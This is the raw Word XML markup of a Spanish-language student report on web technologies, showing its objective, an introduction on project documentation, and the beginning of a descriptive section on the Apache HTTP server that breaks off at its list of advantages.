                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520864 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>131</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00A70863" w:rsidRDefault="00A70863">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE40E4" w:rsidRDefault="00AE40E4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="00CC5D8F" w:rsidP="00A70863">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc504954314"/>
      <w:bookmarkStart w:id="3" w:name="_Toc507193523"/>
      <w:bookmarkStart w:id="4" w:name="_Toc509522657"/>
      <w:bookmarkStart w:id="5" w:name="_Toc514520836"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OBJETIVO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E660C" w:rsidRPr="007E660C" w:rsidRDefault="007E660C" w:rsidP="00F35C08"/>
    <w:p w:rsidR="00206A9C" w:rsidRPr="00206A9C" w:rsidRDefault="00206A9C" w:rsidP="000E5951">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00206A9C">
        <w:t>Promover en el alumno las competencias de autonomía y análisis a través de la búsqueda y evaluación de información requerida para determinar las ventajas y desventajas de las diversas tecnologías web, así como los documentos que se generan al inicio de un proyecto que incluya tecnologías web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="000E5951">
      <w:pPr>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071789C" w:rsidRDefault="0071789C" w:rsidP="001358CD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:sectPr w:rsidR="0071789C">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="00CC5D8F" w:rsidP="00A70863">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc514520837"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUCCIÓN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00064150" w:rsidRDefault="00064150" w:rsidP="00064150">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00064150" w:rsidRDefault="00064150" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:tab/>
        <w:t>En la actualidad el uso de las tecnologías web en el ámbito laboral ha incrementado de una manera increíble, esto ha impulsado a las empresas para que se actualicen y trabajen en el ámbito web, las tecnologías web han ayudado a las empresas a mejorar en su desarrollo, tanto en la administración como en el comercio en línea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D696B" w:rsidRDefault="002D696B" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00064150" w:rsidRDefault="002D696B" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00A668E3">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La tecnología es un</w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">a herramienta </w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00A668E3">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00A668E3">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>as empresas que se encuentran en el proceso de crecimiento, es una herramienta con la que puede lograrse la optimización y mejora de</w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> algunos de sus </w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00A668E3">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>proces</w:t>
      </w:r>
      <w:r w:rsidR="005E008C">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">os de producción, organización y </w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00A668E3">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ventas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D696B" w:rsidRDefault="002D696B" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00064150" w:rsidRDefault="002D696B" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Antes de que inicien un proyecto se generan una serie de documentos que son de utilidad como fuente de búsqueda para solucionar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">problemas, en el transcurso de todo el </w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">proyecto se generan una gran cantidad de documentos importantes para que el proyecto se complete, es importante realizar estos documentos antes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">de iniciar y durante el desarrollo de las </w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>actividades de las fases del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D696B" w:rsidRDefault="002D696B" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00064150" w:rsidRDefault="002D696B" w:rsidP="000408C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Al realizar la documentación se pueden atenuar los problemas, ya que c</w:t>
      </w:r>
      <w:r w:rsidR="005E008C">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>uando estos se producen</w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00DA4ACC">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, el tiempo </w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>de desarrollo de las actividades</w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00DA4ACC">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y procesos</w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> se pueden detener lo que atrasaría el proyecto o su cancelación</w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00DA4ACC">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. La documentación acorta </w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el tiempo</w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00DA4ACC">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de recuperación y </w:t>
      </w:r>
      <w:r w:rsidR="00064150">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">ayuda a </w:t>
      </w:r>
      <w:r w:rsidR="00064150" w:rsidRPr="00DA4ACC">
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>corregir los errores de modo más eficiente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5836" w:rsidRPr="00064150" w:rsidRDefault="006A5836" w:rsidP="00AD27A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F35C08" w:rsidRDefault="00F35C08" w:rsidP="0036169D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F35C08" w:rsidRDefault="00F35C08" w:rsidP="0036169D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D01B74" w:rsidRDefault="00D01B74" w:rsidP="0036169D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:sectPr w:rsidR="00D01B74" w:rsidSect="00DA067C">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0036169D" w:rsidRDefault="00CC5D8F" w:rsidP="0036169D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc514520838"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CONTENIDO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00DA067C" w:rsidRPr="00DA067C" w:rsidRDefault="00DA067C" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA067C" w:rsidRDefault="00DA067C" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA067C" w:rsidRDefault="00521C41" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc514520839"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Tecnologías Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc514520840"/>
      <w:r w:rsidRPr="00890B46">
        <w:t>Lado servidor: Servidores</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00890B46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64"/>
    <w:p w:rsidR="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64"/>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30F15587" wp14:editId="356AD98F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1412069</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>476885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2893060" cy="1344295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="7" name="Imagen 7" descr="Resultado de imagen para apache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apache serv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3060" cy="13442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50F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00A406EB" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>El servidor HTTP Apache es un servidor web HTTP de código abierto para plataformas Unix(BSD, GNU/Linux, etc.), Windows, Macintosh y otras, que implementa el protocolo HTTP/1.1 y la noción de sitio virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00A406EB" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>El servidor Apache se desarrolla dentro del proyecto HTTP Server (HTTPD) de la Apache Software Foundation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00A406EB" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Apache es altamente configurable, admite bases de datos de autenticación y negociado de contenido, aunque carece de una interfaz gráfica que ayude en su configuración.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00A406EB" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache es una aplicación que permite montar un servidor web en cualquier equipo y casi cualquier sistema operativo. Apache soporta PHP como lenguaje de programación. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1679874968"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FD163F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FD163F">
            <w:instrText xml:space="preserve"> CITATION AJD18 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FD163F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(AJDP Soft, 2018)</w:t>
          </w:r>
          <w:r w:rsidR="00FD163F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte de seguridad SSL y TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede realizar autenticación de datos utilizando SGDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede dar soporte a diferentes lenguajes, como Perl, PHP, Python y tcl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas:</w:t>
      </w:r>
    </w:p>
